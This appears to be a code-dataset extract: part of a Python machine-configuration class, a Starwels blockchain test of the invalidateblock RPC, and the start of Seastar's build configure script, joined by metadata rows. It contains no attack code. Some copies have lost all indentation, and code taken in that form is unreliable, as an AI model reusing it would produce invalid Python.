if machine is None:
names_not_found.append(nametomatch)
nametomatch = socket.gethostname()
machine = self._probe_machine_name_one_guess(nametomatch)
if machine is None:
names_not_found.append(nametomatch)
names_not_found_quoted = ["'" + name + "'" for name in names_not_found]
names_not_found_str = ' or '.join(names_not_found_quoted)
if warn:
logger.warning("Could not find machine match for {}".format(names_not_found_str))
return machine
def _probe_machine_name_one_guess(self, nametomatch):
machine = None
nodes = self.get_children("machine")
for node in nodes:
machtocheck = self.get(node, "MACH")
logger.debug("machine is " + machtocheck)
regex_str_node = self.get_optional_child("NODENAME_REGEX", root=node)
regex_str = machtocheck if regex_str_node is None else self.text(regex_str_node)
if regex_str is not None:
logger.debug("machine regex string is " + regex_str)
regex = re.compile(regex_str)
if regex.match(nametomatch):
logger.debug("Found machine: {} matches {}".format(machtocheck, nametomatch))
machine = machtocheck
break
return machine
def set_machine(self, machine):
if machine == "Query":
self.machine = machine
elif self.machine != machine or self.machine_node is None:
self.machine_node = super(Machines,self).get_child("machine", {"MACH" : machine}, err_msg="No machine {} found".format(machine))
self.machine = machine
return machine
def get_value(self, name, attributes=None, resolved=True, subgroup=None):
expect(self.machine_node is not None, "Machine object has no machine defined")
expect(subgroup is None, "This class does not support subgroups")
value = None
if name == "COMPILER":
value = self.get_default_compiler()
elif name == "MPILIB":
value = self.get_default_MPIlib(attributes)
else:
node = self.get_optional_child(name, root=self.machine_node, attributes=attributes)
if node is not None:
value = self.text(node)
if resolved:
if value is not None:
value = self.get_resolved_value(value)
elif name in os.environ:
value = os.environ[name]
value = convert_to_unknown_type(value)
return value
def get_field_from_list(self, listname, reqval=None, attributes=None):
expect(self.machine_node is not None, "Machine object has no machine defined")
supported_values = self.get_value(listname, attributes=attributes)
if supported_values is None:
supported_values = self.get_value(listname, attributes=None)
expect(supported_values is not None,
"No list found for " + listname + " on machine " + self.machine)
supported_values = supported_values.split(",")
if reqval is None or reqval == "UNSET":
return supported_values[0]
for val in supported_values:
if val == reqval:
return reqval
return None
def get_default_compiler(self):
cime_config = get_cime_config()
if cime_config.has_option('main','COMPILER'):
value = cime_config.get('main', 'COMPILER')
expect(self.is_valid_compiler(value), "User-selected compiler {} is not supported on machine {}".format(value, self.machine))
else:
value = self.get_field_from_list("COMPILERS")
return value
def get_default_MPIlib(self, attributes=None):
return self.get_field_from_list("MPILIBS", attributes=attributes)
def is_valid_compiler(self,compiler):
return self.get_field_from_list("COMPILERS", reqval=compiler) is not None
def is_valid_MPIlib(self, mpilib, attributes=None):
return mpilib == "mpi-serial" or \
self.get_field_from_list("MPILIBS", reqval=mpilib, attributes=attributes) is not None
def has_batch_system(self):
result = False
batch_system = self.get_optional_child("BATCH_SYSTEM", root=self.machine_node)
if batch_system is not None:
result = (self.text(batch_system) is not None and self.text(batch_system) != "none")
logger.debug("Machine {} has batch: {}".format(self.machine, result))
return result
def get_suffix(self, suffix_type):
node = self.get_optional_child("default_run_suffix")
if node is not None:
suffix_node = self.get_optional_child(suffix_type, root=node)
if suffix_node is not None:
return self.text(suffix_node)
return None
def set_value(self, vid, value, subgroup=None, ignore_type=True):
tmproot = self.root
self.root = self.machine_node
result = super(Machines, self).set_value(vid, value, subgroup=subgroup,
ignore_type=ignore_type)
self.root = tmproot
return result
def print_values(self):
machines = self.get_children("machine")
logger.info("Machines")
for machine in machines:
name = self.get(machine, "MACH")
desc = self.get_child("DESC", root=machine)
os_ = self.get_child("OS", root=machine)
compilers = self.get_child("COMPILERS", root=machine)
max_tasks_per_node = self.get_child("MAX_TASKS_PER_NODE", root=machine)
max_mpitasks_per_node = self.get_child("MAX_MPITASKS_PER_NODE", root=machine)
print( " {} : {} ".format(name , self.text(desc)))
print( " os ", self.text(os_))
print( " compilers ",self.text(compilers))
if max_mpitasks_per_node is not None:
print(" pes/node ",self.text(max_mpitasks_per_node))
if max_tasks_per_node is not None:
print(" max_tasks/node ",self.text(max_tasks_per_node))
def return_values(self):
machines = self.get_children("machine")
mach_dict = dict()
logger.info("Machines return values")
for machine in machines:
name = self.get(machine, "MACH")
desc = self.get_child("DESC", root=machine)
mach_dict[(name,"description")] = self.text(desc)
os_ = self.get_child("OS", root=machine)
mach_dict[(name,"os")] = self.text(os_)
compilers = self.get_child("COMPILERS", root=machine)
mach_dict[(name,"compilers")] = self.text(compilers)
max_tasks_per_node = self.get_child("MAX_TASKS_PER_NODE", root=machine)
if max_tasks_per_node is not None:
mach_dict[(name,"max_tasks_per_node")] = self.text(max_tasks_per_node)
max_mpitasks_per_node = self.get_child("MAX_MPITASKS_PER_NODE", root=machine)
if max_mpitasks_per_node is not None:
mach_dict[(name,"max_mpitasks_per_node")] = self.text( max_mpitasks_per_node)
return mach_dict
| true | true |
f725df17ca09efe9699ffac94afdaac33246a3bd | 2,794 | py | Python | test/functional/rpc_invalidateblock.py | 1185/starwels | 48800688ae90318ac6ed74796dde42ac283484e9 | [
"MIT"
] | null | null | null | test/functional/rpc_invalidateblock.py | 1185/starwels | 48800688ae90318ac6ed74796dde42ac283484e9 | [
"MIT"
] | null | null | null | test/functional/rpc_invalidateblock.py | 1185/starwels | 48800688ae90318ac6ed74796dde42ac283484e9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2019 The Starwels developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the invalidateblock RPC."""
from test_framework.test_framework import StarwelsTestFramework
from test_framework.util import *
class InvalidateTest(StarwelsTestFramework):
    """Functional test for the invalidateblock RPC across a 3-node network."""
    def set_test_params(self):
        # Three independent nodes starting from an empty chain.
        self.setup_clean_chain = True
        self.num_nodes = 3
    def setup_network(self):
        # Start the nodes unconnected; connections are made explicitly in
        # run_test so competing chains can be mined first.
        self.setup_nodes()
    def run_test(self):
        """Exercise invalidateblock: reorg back to a shorter chain, and verify
        nodes never reorg to a lower-work chain afterwards."""
        self.log.info("Make sure we repopulate setBlockIndexCandidates after InvalidateBlock:")
        self.log.info("Mine 4 blocks on Node 0")
        self.nodes[0].generate(4)
        assert(self.nodes[0].getblockcount() == 4)
        besthash = self.nodes[0].getbestblockhash()
        self.log.info("Mine competing 6 blocks on Node 1")
        self.nodes[1].generate(6)
        assert(self.nodes[1].getblockcount() == 6)
        self.log.info("Connect nodes to force a reorg")
        connect_nodes_bi(self.nodes,0,1)
        sync_blocks(self.nodes[0:2])
        # Node 0 adopts node 1's longer (6-block) chain.
        assert(self.nodes[0].getblockcount() == 6)
        badhash = self.nodes[1].getblockhash(2)
        self.log.info("Invalidate block 2 on node 0 and verify we reorg to node 0's original chain")
        self.nodes[0].invalidateblock(badhash)
        newheight = self.nodes[0].getblockcount()
        newhash = self.nodes[0].getbestblockhash()
        if (newheight != 4 or newhash != besthash):
            raise AssertionError("Wrong tip for node0, hash %s, height %d"%(newhash,newheight))
        self.log.info("Make sure we won't reorg to a lower work chain:")
        connect_nodes_bi(self.nodes,1,2)
        self.log.info("Sync node 2 to node 1 so both have 6 blocks")
        sync_blocks(self.nodes[1:3])
        assert(self.nodes[2].getblockcount() == 6)
        self.log.info("Invalidate block 5 on node 1 so its tip is now at 4")
        self.nodes[1].invalidateblock(self.nodes[1].getblockhash(5))
        assert(self.nodes[1].getblockcount() == 4)
        self.log.info("Invalidate block 3 on node 2, so its tip is now 2")
        self.nodes[2].invalidateblock(self.nodes[2].getblockhash(3))
        assert(self.nodes[2].getblockcount() == 2)
        self.log.info("..and then mine a block")
        self.nodes[2].generate(1)
        self.log.info("Verify all nodes are at the right height")
        # Give propagation a moment; node 2's 3-block chain must NOT displace
        # the higher-work chains on nodes 0 and 1.
        time.sleep(5)
        assert_equal(self.nodes[2].getblockcount(), 3)
        assert_equal(self.nodes[0].getblockcount(), 4)
        node1height = self.nodes[1].getblockcount()
        if node1height < 4:
            raise AssertionError("Node 1 reorged to a lower height: %d"%node1height)
if __name__ == '__main__':
InvalidateTest().main()
| 42.984615 | 100 | 0.659628 |
from test_framework.test_framework import StarwelsTestFramework
from test_framework.util import *
class InvalidateTest(StarwelsTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
def setup_network(self):
self.setup_nodes()
def run_test(self):
self.log.info("Make sure we repopulate setBlockIndexCandidates after InvalidateBlock:")
self.log.info("Mine 4 blocks on Node 0")
self.nodes[0].generate(4)
assert(self.nodes[0].getblockcount() == 4)
besthash = self.nodes[0].getbestblockhash()
self.log.info("Mine competing 6 blocks on Node 1")
self.nodes[1].generate(6)
assert(self.nodes[1].getblockcount() == 6)
self.log.info("Connect nodes to force a reorg")
connect_nodes_bi(self.nodes,0,1)
sync_blocks(self.nodes[0:2])
assert(self.nodes[0].getblockcount() == 6)
badhash = self.nodes[1].getblockhash(2)
self.log.info("Invalidate block 2 on node 0 and verify we reorg to node 0's original chain")
self.nodes[0].invalidateblock(badhash)
newheight = self.nodes[0].getblockcount()
newhash = self.nodes[0].getbestblockhash()
if (newheight != 4 or newhash != besthash):
raise AssertionError("Wrong tip for node0, hash %s, height %d"%(newhash,newheight))
self.log.info("Make sure we won't reorg to a lower work chain:")
connect_nodes_bi(self.nodes,1,2)
self.log.info("Sync node 2 to node 1 so both have 6 blocks")
sync_blocks(self.nodes[1:3])
assert(self.nodes[2].getblockcount() == 6)
self.log.info("Invalidate block 5 on node 1 so its tip is now at 4")
self.nodes[1].invalidateblock(self.nodes[1].getblockhash(5))
assert(self.nodes[1].getblockcount() == 4)
self.log.info("Invalidate block 3 on node 2, so its tip is now 2")
self.nodes[2].invalidateblock(self.nodes[2].getblockhash(3))
assert(self.nodes[2].getblockcount() == 2)
self.log.info("..and then mine a block")
self.nodes[2].generate(1)
self.log.info("Verify all nodes are at the right height")
time.sleep(5)
assert_equal(self.nodes[2].getblockcount(), 3)
assert_equal(self.nodes[0].getblockcount(), 4)
node1height = self.nodes[1].getblockcount()
if node1height < 4:
raise AssertionError("Node 1 reorged to a lower height: %d"%node1height)
if __name__ == '__main__':
InvalidateTest().main()
| true | true |
f725dff5cb4fe0332ca1c2febb521e5f7662dff2 | 41,343 | py | Python | xdl/third_party/seastar/configure.py | Ru-Xiang/x-deeplearning | 04cc0497150920c64b06bb8c314ef89977a3427a | [
"Apache-2.0"
] | 4,071 | 2018-12-13T04:17:38.000Z | 2022-03-30T03:29:35.000Z | xdl/third_party/seastar/configure.py | laozhuang727/x-deeplearning | 781545783a4e2bbbda48fc64318fb2c6d8bbb3cc | [
"Apache-2.0"
] | 359 | 2018-12-21T01:14:57.000Z | 2022-02-15T07:18:02.000Z | xdl/third_party/seastar/configure.py | laozhuang727/x-deeplearning | 781545783a4e2bbbda48fc64318fb2c6d8bbb3cc | [
"Apache-2.0"
] | 1,054 | 2018-12-20T09:57:42.000Z | 2022-03-29T07:16:53.000Z | #!/usr/bin/env python3
#
# This file is open source software, licensed to you under the terms
# of the Apache License, Version 2.0 (the "License"). See the NOTICE file
# distributed with this work for additional information regarding copyright
# ownership. You may not use this file except in compliance with the License.
#
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os, os.path, textwrap, argparse, sys, shlex, subprocess, tempfile, re
configure_args = str.join(' ', [shlex.quote(x) for x in sys.argv[1:]])
tempfile.tempdir = "./build/tmp"
srcdir = os.getcwd()
def get_flags():
    """Return the CPU feature flags from /proc/cpuinfo as a list of strings.

    Returns None when no 'flags' line is found (e.g. non-x86 kernels).
    """
    with open('/proc/cpuinfo') as cpuinfo:
        for raw in cpuinfo:
            # Skip blank lines; the first 'flags' entry is representative of
            # every core, so stop there.
            if raw.strip() and raw.rstrip('\n').startswith('flags'):
                return re.sub(r'^flags\s+: ', '', raw).split()
def add_tristate(arg_parser, name, dest, help):
    """Register a paired --enable-NAME / --disable-NAME option on *arg_parser*.

    Both flags share *dest*; the default stays None so callers can tell
    "not specified" apart from an explicit enable/disable.
    """
    for prefix, enabled in (('--enable-', True), ('--disable-', False)):
        arg_parser.add_argument(prefix + name, dest = dest,
                                action = 'store_true' if enabled else 'store_false',
                                default = None,
                                help = ('Enable ' if enabled else 'Disable ') + help)
def apply_tristate(var, test, note, missing):
    """Resolve a tri-state option against a feature probe.

    var is None (auto) or a user choice; test() probes availability.
    Returns True when the feature is used. Auto-mode failure prints *note*
    and returns False; an explicit --enable that fails prints *missing* and
    exits with status 1; an explicit --disable returns False silently.
    """
    if var is not None and not var:
        # Explicitly disabled: nothing to probe.
        return False
    if test():
        return True
    if var == True:
        # User demanded the feature but the probe failed: hard error.
        print(missing)
        sys.exit(1)
    print(note)
    return False
#
# dpdk_cflags - fetch the DPDK specific CFLAGS
#
# Run a simple makefile that "includes" the DPDK main makefile and prints the
# MACHINE_CFLAGS value
#
def dpdk_cflags(dpdk_target):
    """Return the DPDK-specific CFLAGS (MACHINE_CFLAGS) for *dpdk_target*.

    Writes a throwaway one-rule makefile that includes the DPDK build system
    and echoes $(MACHINE_CFLAGS), runs make over it, and returns the captured
    output with trailing newlines stripped.
    """
    ensure_tmp_dir_exists()
    with tempfile.NamedTemporaryFile() as sfile:
        # Derive SDK path / target name / arch from a path shaped like
        # <sdk>/x86_64-native-linuxapp-gcc.
        dpdk_target = os.path.abspath(dpdk_target)
        dpdk_target = re.sub(r'\/+$', '', dpdk_target)
        dpdk_sdk_path = os.path.dirname(dpdk_target)
        dpdk_target_name = os.path.basename(dpdk_target)
        dpdk_arch = dpdk_target_name.split('-')[0]
        if args.dpdk:
            # Bundled in-tree DPDK build: fixed locations override the above.
            dpdk_sdk_path = 'dpdk'
            dpdk_target = os.getcwd() + '/build/dpdk'
            dpdk_target_name = 'x86_64-{}-linuxapp-gcc'.format(dpdk_machine)
            dpdk_arch = 'x86_64'
        sfile.file.write(bytes('include ' + dpdk_sdk_path + '/mk/rte.vars.mk' + "\n", 'utf-8'))
        sfile.file.write(bytes('all:' + "\n\t", 'utf-8'))
        sfile.file.write(bytes('@echo $(MACHINE_CFLAGS)' + "\n", 'utf-8'))
        sfile.file.flush()
        # Run make silently: the only stdout is the echoed MACHINE_CFLAGS.
        # (Renamed from 'dpdk_cflags', which shadowed this function; also
        # dropped the dead 'dpdk_cflags_final' local.)
        raw_cflags = subprocess.check_output(['make', '--no-print-directory',
                                              '-f', sfile.name,
                                              'RTE_SDK=' + dpdk_sdk_path,
                                              'RTE_OUTPUT=' + dpdk_target,
                                              'RTE_TARGET=' + dpdk_target_name,
                                              'RTE_SDK_BIN=' + dpdk_target,
                                              'RTE_ARCH=' + dpdk_arch])
        return re.sub(r'\n+$', '', raw_cflags.decode('utf-8'))
def try_compile(compiler, source = '', flags = []):
    """Return True if *source* compiles with *compiler* (compile-only: adds -c,
    so no link step is performed)."""
    return try_compile_and_link(compiler, source, flags = flags + ['-c'])
def ensure_tmp_dir_exists():
    """Create the scratch directory used for compile probes (tempfile.tempdir).

    Uses exist_ok=True so there is no race between the existence check and
    the creation (the old exists()/makedirs() pair could raise if another
    process created the directory in between).
    """
    os.makedirs(tempfile.tempdir, exist_ok=True)
def try_compile_and_link(compiler, source = '', flags = []):
    """Return True if *source* compiles AND links with *compiler* and *flags*.

    The user's configured cflags (args.user_cflags) are always included, so
    this probes the same environment the real build will use. Compiler
    output is discarded; only the exit status matters.
    """
    ensure_tmp_dir_exists()
    with tempfile.NamedTemporaryFile() as sfile:
        # mktemp only reserves a name; gcc itself creates the output file.
        ofile = tempfile.mktemp()
        try:
            sfile.file.write(bytes(source, 'utf-8'))
            sfile.file.flush()
            # We can't write to /dev/null, since in some cases (-ftest-coverage) gcc will create an auxiliary
            # output file based on the name of the output file, and "/dev/null.gcsa" is not a good name
            return subprocess.call([compiler, '-x', 'c++', '-o', ofile, sfile.name] + args.user_cflags.split() + flags,
                                   stdout = subprocess.DEVNULL,
                                   stderr = subprocess.DEVNULL) == 0
        finally:
            # Clean up the probe binary whether or not compilation succeeded.
            if os.path.exists(ofile):
                os.unlink(ofile)
def try_compile_and_run(compiler, flags, source, env = {}):
    """Compile *source*, run the resulting binary with *env* overlaid on the
    current environment, and return True if it exits with status 0.

    Note: *env* is never mutated here (it is merged into a copy of
    os.environ), so the mutable default is safe.
    """
    ensure_tmp_dir_exists()
    mktemp = tempfile.NamedTemporaryFile
    with mktemp() as sfile, mktemp(mode='rb') as xfile:
        sfile.file.write(bytes(source, 'utf-8'))
        sfile.file.flush()
        # Close our handle so the compiler can (re)create the executable at
        # xfile.name; the NamedTemporaryFile still unlinks it on exit.
        xfile.file.close()
        if subprocess.call([compiler, '-x', 'c++', '-o', xfile.name, sfile.name] + args.user_cflags.split() + flags,
                            stdout = subprocess.DEVNULL, stderr = subprocess.DEVNULL) != 0:
            # The compiler may delete the target on failure, and lead to
            # NamedTemporaryFile's destructor throwing an exception.
            open(xfile.name, 'a').close()
            return False
        e = os.environ.copy()
        e.update(env)
        env = e
        return subprocess.call([xfile.name], stdout = subprocess.DEVNULL, stderr = subprocess.DEVNULL, env=env) == 0
def warning_supported(warning, compiler):
    """Return True if *compiler* recognizes *warning*.

    gcc silently accepts unknown -Wno-x flags, so probe the positive -Wx
    form instead, with -Werror to turn "unknown warning" into a failure.
    """
    # gcc ignores -Wno-x even if it is not supported
    adjusted = re.sub('^-Wno-', '-W', warning)
    return try_compile(flags = [adjusted, '-Werror'], compiler = compiler)
def debug_flag(compiler):
    """Return '-g' if *compiler* can emit debug info for C++14 auto-return
    members, or '' (with a notice) on older compilers where this ICEs/fails."""
    src_with_auto = textwrap.dedent('''\
        template <typename T>
        struct x { auto f() {} };
        x<int> a;
        ''')
    if try_compile(source = src_with_auto, flags = ['-g', '-std=gnu++1y'], compiler = compiler):
        return '-g'
    else:
        print('Note: debug information disabled; upgrade your compiler')
        return ''
def sanitize_vptr_flag(compiler):
    """Return '-fno-sanitize=vptr' when the compiler's vptr sanitizer is
    known-broken, else '' (keep vptr sanitizing enabled).

    The runtime probe below is currently short-circuited by 'and False'
    because -fsanitize=vptr misbehaves even when the probe passes, so today
    this effectively always disables vptr sanitizing when the flag exists.
    """
    # https://gcc.gnu.org/bugzilla/show_bug.cgi?id=67258
    if (not try_compile(compiler, flags=['-fsanitize=vptr'])
        or (try_compile_and_run(compiler, flags=['-fsanitize=undefined', '-fno-sanitize-recover'],
                               env={'UBSAN_OPTIONS': 'exitcode=1'}, source=textwrap.dedent('''
            struct A
            {
                virtual ~A() {}
            };
            struct B : virtual A {};
            struct C : virtual A {};
            struct D : B, virtual C {};

            int main()
            {
                D d;
            }
            '''))
            and False)): # -fsanitize=vptr is broken even when the test above passes
        return ''
    else:
        print('Notice: -fsanitize=vptr is broken, disabling; some debug mode tests are bypassed.')
        return '-fno-sanitize=vptr'
def adjust_visibility_flags(compiler):
    """Return '-Wno-attributes' when the compiler spuriously warns on nested
    lambdas capturing 'this' under -fvisibility=hidden, else ''."""
    # https://gcc.gnu.org/bugzilla/show_bug.cgi?id=80947
    flags = ['-fvisibility=hidden', '-std=gnu++1y', '-Werror=attributes']
    # The nested-lambda capture below is the minimal reproducer for the bug.
    if not try_compile(compiler, flags=flags, source=textwrap.dedent('''
            template <class T>
            class MyClass {
            public:
                MyClass() {
                    auto outer = [this] ()
                    {
                        auto fn = [this] { };
                        //use fn for something here
                    };
                }
            };

            int main() {
                MyClass<int> r;
            }
            ''')):
        print('Notice: disabling -Wattributes due to https://gcc.gnu.org/bugzilla/show_bug.cgi?id=80947')
        return '-Wno-attributes'
    else:
        return ''
modes = {
'debug': {
'sanitize': '-fsanitize=address -fsanitize=leak -fsanitize=undefined',
'sanitize_libs': '-lasan -lubsan',
'opt': '-O0 -DDEBUG -DDEBUG_SHARED_PTR -DDEFAULT_ALLOCATOR -DSEASTAR_THREAD_STACK_GUARDS -DNO_EXCEPTION_HACK',
'libs': '',
'cares_opts': '-DCARES_STATIC=ON -DCARES_SHARED=OFF -DCMAKE_BUILD_TYPE=Debug',
},
'release': {
'sanitize': '',
'sanitize_libs': '',
'opt': '-O2 -DNDEBUG -DDEFAULT_ALLOCATOR',
'libs': '',
'cares_opts': '-DCARES_STATIC=ON -DCARES_SHARED=OFF -DCMAKE_BUILD_TYPE=Release',
},
}
tests = [
'tests/fileiotest',
'tests/directory_test',
'tests/linecount',
'tests/echotest',
'tests/l3_test',
'tests/ip_test',
'tests/timertest',
'tests/tcp_test',
'tests/futures_test',
'tests/alloc_test',
'tests/foreign_ptr_test',
'tests/smp_test',
'tests/thread_test',
'tests/thread_context_switch',
'tests/udp_server',
'tests/udp_client',
'tests/blkdiscard_test',
'tests/sstring_test',
'tests/unwind_test',
'tests/defer_test',
'tests/httpd',
'tests/memcached/test_ascii_parser',
'tests/tcp_sctp_server',
'tests/tcp_sctp_client',
'tests/allocator_test',
'tests/output_stream_test',
'tests/udp_zero_copy',
'tests/shared_ptr_test',
'tests/weak_ptr_test',
'tests/checked_ptr_test',
'tests/slab_test',
'tests/fstream_test',
'tests/distributed_test',
'tests/rpc',
'tests/semaphore_test',
'tests/expiring_fifo_test',
'tests/packet_test',
'tests/tls_test',
'tests/fair_queue_test',
'tests/rpc_test',
'tests/connect_test',
'tests/chunked_fifo_test',
'tests/circular_buffer_test',
'tests/perf/perf_fstream',
'tests/json_formatter_test',
'tests/dns_test',
'tests/execution_stage_test',
'tests/lowres_clock_test',
'tests/program_options_test',
'tests/tuple_utils_test',
'tests/tls_echo_server',
'tests/tls_simple_client',
'tests/circular_buffer_fixed_capacity_test',
'tests/noncopyable_function_test',
]
apps = [
'apps/httpd/httpd',
'apps/seawreck/seawreck',
'apps/fair_queue_tester/fair_queue_tester',
'apps/memcached/memcached',
'apps/iotune/iotune',
'tests/scheduling_group_demo',
]
all_artifacts = apps + tests + ['libseastar.a', 'seastar.pc']
arg_parser = argparse.ArgumentParser('Configure seastar')
arg_parser.add_argument('--static', dest = 'static', action = 'store_const', default = '',
const = '-static',
help = 'Static link (useful for running on hosts outside the build environment)')
arg_parser.add_argument('--embedded-static', dest = 'embedded_static', action = 'store_const', default = '',
const = '-embedded-static',
help = 'Static link with -fPIC (can be embedded in a shared library)')
arg_parser.add_argument('--pie', dest = 'pie', action = 'store_true',
help = 'Build position-independent executable (PIE)')
arg_parser.add_argument('--so', dest = 'so', action = 'store_true',
help = 'Build shared object (SO) instead of executable')
arg_parser.add_argument('--mode', action='store', choices=list(modes.keys()) + ['all'], default='all')
arg_parser.add_argument('--with', dest='artifacts', action='append', choices=all_artifacts, default=[])
arg_parser.add_argument('--cflags', action = 'store', dest = 'user_cflags', default = '',
help = 'Extra flags for the C++ compiler')
arg_parser.add_argument('--ldflags', action = 'store', dest = 'user_ldflags', default = '',
help = 'Extra flags for the linker')
arg_parser.add_argument('--compiler', action = 'store', dest = 'cxx', default = 'g++',
help = 'C++ compiler path')
arg_parser.add_argument('--c-compiler', action='store', dest='cc', default='gcc',
help = 'C compiler path (for bundled libraries such as dpdk and c-ares)')
arg_parser.add_argument('--with-osv', action = 'store', dest = 'with_osv', default = '',
help = 'Shortcut for compile for OSv')
arg_parser.add_argument('--enable-dpdk', action = 'store_true', dest = 'dpdk', default = False,
help = 'Enable dpdk (from included dpdk sources)')
arg_parser.add_argument('--dpdk-target', action = 'store', dest = 'dpdk_target', default = '',
help = 'Path to DPDK SDK target location (e.g. <DPDK SDK dir>/x86_64-native-linuxapp-gcc)')
arg_parser.add_argument('--debuginfo', action = 'store', dest = 'debuginfo', type = int, default = 1,
help = 'Enable(1)/disable(0)compiler debug information generation')
arg_parser.add_argument('--tests-debuginfo', action='store', dest='tests_debuginfo', type=int, default=0,
help='Enable(1)/disable(0)compiler debug information generation for tests')
arg_parser.add_argument('--static-stdc++', dest = 'staticcxx', action = 'store_true',
help = 'Link libgcc and libstdc++ statically')
arg_parser.add_argument('--static-boost', dest = 'staticboost', action = 'store_true',
help = 'Link with boost statically')
add_tristate(arg_parser, name = 'hwloc', dest = 'hwloc', help = 'hwloc support')
arg_parser.add_argument('--enable-gcc6-concepts', dest='gcc6_concepts', action='store_true', default=False,
help='enable experimental support for C++ Concepts as implemented in GCC 6')
add_tristate(arg_parser, name = 'exception-scalability-workaround', dest='exception_workaround',
help='disabling override of dl_iterate_phdr symbol to workaround C++ exception scalability issues')
arg_parser.add_argument('--allocator-page-size', dest='allocator_page_size', type=int, help='override allocator page size')
args = arg_parser.parse_args()
libnet = [
'net/proxy.cc',
'net/virtio.cc',
'net/dpdk.cc',
'net/ip.cc',
'net/ethernet.cc',
'net/arp.cc',
'net/native-stack.cc',
'net/ip_checksum.cc',
'net/udp.cc',
'net/tcp.cc',
'net/dhcp.cc',
'net/tls.cc',
'net/dns.cc',
]
core = [
'core/reactor.cc',
'core/systemwide_memory_barrier.cc',
'core/fstream.cc',
'core/posix.cc',
'core/memory.cc',
'core/resource.cc',
'core/scollectd.cc',
'core/metrics.cc',
'core/app-template.cc',
'core/thread.cc',
'core/dpdk_rte.cc',
'core/fsqual.cc',
'util/conversions.cc',
'util/program-options.cc',
'util/log.cc',
'util/backtrace.cc',
'net/packet.cc',
'net/posix-stack.cc',
'net/net.cc',
'net/stack.cc',
'net/inet_address.cc',
'rpc/rpc.cc',
'rpc/lz4_compressor.cc',
'core/exception_hacks.cc',
]
protobuf = [
'proto/metrics2.proto',
]
#prometheus = [
# 'core/prometheus.cc',
# ]
http = ['http/transformers.cc',
'http/json_path.cc',
'http/file_handler.cc',
'http/common.cc',
'http/routes.cc',
'json/json_elements.cc',
'json/formatter.cc',
'http/matcher.cc',
'http/mime_types.cc',
'http/httpd.cc',
'http/reply.cc',
'http/request_parser.rl',
'http/api_docs.cc',
]
boost_test_lib = [
'tests/test-utils.cc',
'tests/test_runner.cc',
]
def maybe_static(flag, libs):
    """Wrap *libs* in -Wl,-Bstatic/-Bdynamic when *flag* requests static
    linkage of those libraries — unless the whole build is already static
    (args.static), in which case the wrapper is redundant."""
    if not flag or args.static:
        return libs
    return '-Wl,-Bstatic {} -Wl,-Bdynamic'.format(libs)
defines = ['FMT_HEADER_ONLY']
# Include -lgcc_s before -lunwind to work around for https://savannah.nongnu.org/bugs/?48486. See https://github.com/scylladb/scylla/issues/1725.
libs = ' '.join(['-laio',
maybe_static(args.staticboost,
'-lboost_program_options -lboost_system -lboost_filesystem'),
'-lstdc++ -lm',
maybe_static(args.staticboost, '-lboost_thread'),
'-lcryptopp -lrt -lgnutls -lgnutlsxx -llz4 -lprotobuf -ldl -lgcc_s -lunwind',
])
boost_unit_test_lib = maybe_static(args.staticboost, '-lboost_unit_test_framework')
hwloc_libs = '-lhwloc -lnuma -lpciaccess -lxml2 -lz'
if args.gcc6_concepts:
defines.append('HAVE_GCC6_CONCEPTS')
args.user_cflags += ' -fconcepts'
if not apply_tristate(args.exception_workaround, test = lambda: not args.staticcxx and not args.static,
note = "Note: disabling exception scalability workaround due to static linkage of libgcc and libstdc++",
missing = "Error: cannot enable exception scalability workaround with static linkage of libgcc and libstdc++"):
defines.append('NO_EXCEPTION_HACK')
if args.staticcxx:
libs = libs.replace('-lstdc++', '')
libs += ' -static-libgcc -static-libstdc++'
if args.staticcxx or args.static:
defines.append("NO_EXCEPTION_INTERCEPT");
memcache_base = [
'apps/memcached/ascii.rl'
] + libnet + core
deps = {
'libseastar.a' : core + libnet + http, # + protobuf + prometheus,
'seastar.pc': [],
'apps/httpd/httpd': ['apps/httpd/demo.json', 'apps/httpd/main.cc'] + http + libnet + core,
'apps/memcached/memcached': ['apps/memcached/memcache.cc'] + memcache_base,
'tests/memcached/test_ascii_parser': ['tests/memcached/test_ascii_parser.cc'] + memcache_base,
'tests/fileiotest': ['tests/fileiotest.cc'] + core,
'tests/directory_test': ['tests/directory_test.cc'] + core,
'tests/linecount': ['tests/linecount.cc'] + core,
'tests/echotest': ['tests/echotest.cc'] + core + libnet,
'tests/l3_test': ['tests/l3_test.cc'] + core + libnet,
'tests/ip_test': ['tests/ip_test.cc'] + core + libnet,
'tests/tcp_test': ['tests/tcp_test.cc'] + core + libnet,
'tests/timertest': ['tests/timertest.cc'] + core,
'tests/futures_test': ['tests/futures_test.cc'] + core,
'tests/alloc_test': ['tests/alloc_test.cc'] + core,
'tests/foreign_ptr_test': ['tests/foreign_ptr_test.cc'] + core,
'tests/semaphore_test': ['tests/semaphore_test.cc'] + core,
'tests/expiring_fifo_test': ['tests/expiring_fifo_test.cc'] + core,
'tests/smp_test': ['tests/smp_test.cc'] + core,
'tests/thread_test': ['tests/thread_test.cc'] + core,
'tests/thread_context_switch': ['tests/thread_context_switch.cc'] + core,
'tests/udp_server': ['tests/udp_server.cc'] + core + libnet,
'tests/udp_client': ['tests/udp_client.cc'] + core + libnet,
'tests/tcp_sctp_server': ['tests/tcp_sctp_server.cc'] + core + libnet,
'tests/tcp_sctp_client': ['tests/tcp_sctp_client.cc'] + core + libnet,
'tests/tls_test': ['tests/tls_test.cc'] + core + libnet,
'tests/fair_queue_test': ['tests/fair_queue_test.cc'] + core,
'apps/seawreck/seawreck': ['apps/seawreck/seawreck.cc', 'http/http_response_parser.rl'] + core + libnet,
'apps/fair_queue_tester/fair_queue_tester': ['apps/fair_queue_tester/fair_queue_tester.cc'] + core,
'apps/iotune/iotune': ['apps/iotune/iotune.cc'] + ['core/resource.cc', 'core/fsqual.cc'],
'tests/blkdiscard_test': ['tests/blkdiscard_test.cc'] + core,
'tests/sstring_test': ['tests/sstring_test.cc'] + core,
'tests/unwind_test': ['tests/unwind_test.cc'] + core,
'tests/defer_test': ['tests/defer_test.cc'] + core,
'tests/httpd': ['tests/httpd.cc'] + http + core,
'tests/allocator_test': ['tests/allocator_test.cc'] + core,
